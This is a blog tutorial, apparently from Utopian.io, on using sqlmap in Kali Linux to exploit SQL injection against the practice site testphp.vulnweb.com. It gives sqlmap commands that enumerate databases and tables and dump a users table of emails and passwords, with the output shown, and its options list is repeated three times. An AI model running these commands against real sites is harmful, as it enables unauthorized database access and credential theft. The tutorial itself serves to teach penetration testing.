![hh.jpg](https://res.cloudinary.com/hpiynhbhq/image/upload/v1518983182/buyitjahb3zsyzjolrue.jpg)

#### What is a Sqlmap...?
**SqlMap** is an Open Source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities and taking over the server database. SqlMap is also one of the automated tools for finding the most popular and powerful website vulnerabilities. With vulnerable http request urls, sqlmap can exploit remote databases and can also extract database names, tables, columns, all data in tables, etc. It can even read and write files on remote file system under certain conditions.features on sqlmap

![1.png](https://res.cloudinary.com/hpiynhbhq/image/upload/v1518935124/ujj71usndez76mcnde1y.png)

#### Function of SqlMap
as for some functions that exist in sqlmap :

- Test the vulnerability and database security of a website
- Exploit security vulnerabilities in application software
- Perform an input filter for sending characters embedded in SQL statements or user inputs not typed correctly and unexpectedly executed.

#### Features of SqlMap
as for some features contained in Sqlmap :
- Full support for MySQL database management system, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB.

- Full support for six SQL Injection techniques: boolean-based blind, time-based blind, error-based, UNION queries, stacked queries and out-of-band.

- Support to directly connect to the database without going through SQL Injection, by providing DBMS credentials, IP addresses, ports and database names.

- Support for counting users, password hashes, privileges, roles, databases, tables and columns.

- Automatic introduction of password hash formats and support for cracking using dictionary based attacks.

- Support to remove the entire database table, the range of specific entries or columns according to user choice. Users can also choose to remove only the number of characters from each column entry.

- Support for searching for specific database names, specific tables in all databases or specific columns in all database tables. This is useful, for example, to identify tables containing custom app credentials where the relevant column names contain strings such as names and passwords.

- Support for downloading and uploading any files from the database server underlying the file system on MySQL database software, PostgreSQL or Microsoft SQL Server.

- Support to execute random commands and retrieve their standard output on the database server underlying the operating system when database software is MySQL, PostgreSQL or Microsoft SQL Server.

#### Tutorial using SqlMap on Kali Linux 2
In this tutorial we will learn how to use sqlmap to exploit vulnerable web applications and see what can be done with Sqlmap.

Then open **Sqlmap** app on Kali Linux the following command :
> Applications ->> Web Application Analysis ->> sqlmap

![1.png](https://res.cloudinary.com/hpiynhbhq/image/upload/v1518973373/nq4wo6c2jrz6nlz6rutt.png)

First, open the linux terminal then if we want to know the option on sqlmap we can use the command :
> sqlmap -h

![2.png](https://res.cloudinary.com/hpiynhbhq/image/upload/v1518973834/hmfc00iw95xvlmr5u4nc.png)

**Note :**

Then we specify a website that has a URL that we will test the vulnerability, for example here using the website **"http: //testphp.vulnweb.com/listproducts.php?cat=11"** which we test as knowledge about vulnerability analysis of a website.

Next, to do vulnerability testing on the target website we can use the command :
> sqlmap –u http: //testphp.vulnweb.com/listproducts.php?cat=1 --dbs

![3.png](https://res.cloudinary.com/hpiynhbhq/image/upload/v1518975325/atrpecdszykunvdjail6.png)

Then when the message **" how do you want to proceed? "** Type command **“ c ”** to continue the testing process.
![4.png](https://res.cloudinary.com/hpiynhbhq/image/upload/v1518976644/oks0vjqzusibpycrivk4.png)

Furthermore, if the message **"Do you want to keep testing the others (if any)? "** Typing the command **“ Y ”** to continue the web vulnerability testing process.
![6.png](https://res.cloudinary.com/hpiynhbhq/image/upload/v1518977083/ebmexwdk07urjdtldmrf.png)

Then after scanning the web vulnerability we find two databases on the target web : **acuart** and **information_schema**
> Available databases [2] :

> [*] acuart

> [*] information_schema

![7.png](https://res.cloudinary.com/hpiynhbhq/image/upload/v1518977868/u44ps1gjnckjiu8ajpxh.png)

Then go to the target database and find some tables in the database we can use the command :
> sqlmap –u http: //testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables 

![8.png](https://res.cloudinary.com/hpiynhbhq/image/upload/v1518978683/phxoeg35zvu3dnpzvara.png)
 
The databases target to be tested here are **" acuart databases ".** Then we find some tables contained there are acuart databases : **artists, carts, categ, featured, guestbook, pictures, products, users.**
> +---------------+

> |     artists     | 
 
> |     carts       |
    
> |     categ      |
   
> |  featured   |
    
> | guestbook  |
    
> |  pictures   |
    
> |  products  |
    
> |    users     |
    
> +---------------+

![9.png](https://res.cloudinary.com/hpiynhbhq/image/upload/v1518979296/eplwwyuzbfn7o6qj8tfb.png)

Finally, the target table in this test is the **"users"**. Then to obtain the information email, name, and password contained in the table we can use the command :
> sqlmap –u http: //testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email, name, pass --dump

![10.png](https://res.cloudinary.com/hpiynhbhq/image/upload/v1518980777/qbrksban1hds1qzwtd1a.png)

Then from the results of vulnerability testing on the web we can find some information of email, username and password on the database : **"acuart"** and table: **"users"**
> database : acuart

> Table : users

> [1 entry]

>   +------------------------------------------------+
    
> |         email         |         name          |       pass         |
    
> +------------------------------------------------+
    
> |email@emailcom  |John smith | test |
    
> +------------------------------------------------+

![11.png](https://res.cloudinary.com/hpiynhbhq/image/upload/v1518980744/mhmbjypdvptfopzh1fwz.png)

**Syntax Description :**

- **--dbs** = to search database information

- **--tables** = to search table information

- **-D **= specifies the target database

- **-T** = to specify the table in the database

- **-C** = to specify coloumn on tabels
- **--dbs** = to search database information

- **--tables** = to search table information

- **-D **= specifies the target database

- **-T** = to specify the table in the database

- **-C** = to specify coloumn on tabels
- **--dbs** = to search database information

- **--tables** = to search table information

- **-D **= specifies the target database

- **-T** = to specify the table in the database

- **-C** = to specify coloumn on tabels



#### Curriculum
as for some Tutorials about Penetration Tools and Web Vulnerabilities on Kali Linux 2

- [Tutorial Penetration Tools #3 ](https://utopian.io/utopian-io/@fandimuhammad11/tutorial-penetration-tools-3-or-or-how-to-find-website-vulnerability-using-nikto-on-kali-linux-2-or-or-bagaimana-mencari)
- [Tutorial Penetration Tools #2](https://utopian.io/utopian-io/@fandimuhammad11/tutorial-penetration-tools-2-or-or-how-to-find-security-slot-in-wordpress-using-wpscan-on-kali-linux-2-or-or-bagaimana-mencari)
- [Tutorial Penetration Tools #1](https://utopian.io/utopian-io/@fandimuhammad11/tutorial-penetration-tools-1-or-or-how-to-port-scanning-using-nmap-on-kali-linux-2-or-or-bagaimana-melakukan-scanning-port)



<br /><hr/><em>Posted on <a href="https://utopian.io/utopian-io/@fandimuhammad11/tutorial-penetration-tools-4-or-or-how-to-testing-website-vulnerability-by-using-sqlmap-in-kali-linux-2">Utopian.io -  Rewarding Open Source Contributors</a></em><hr/>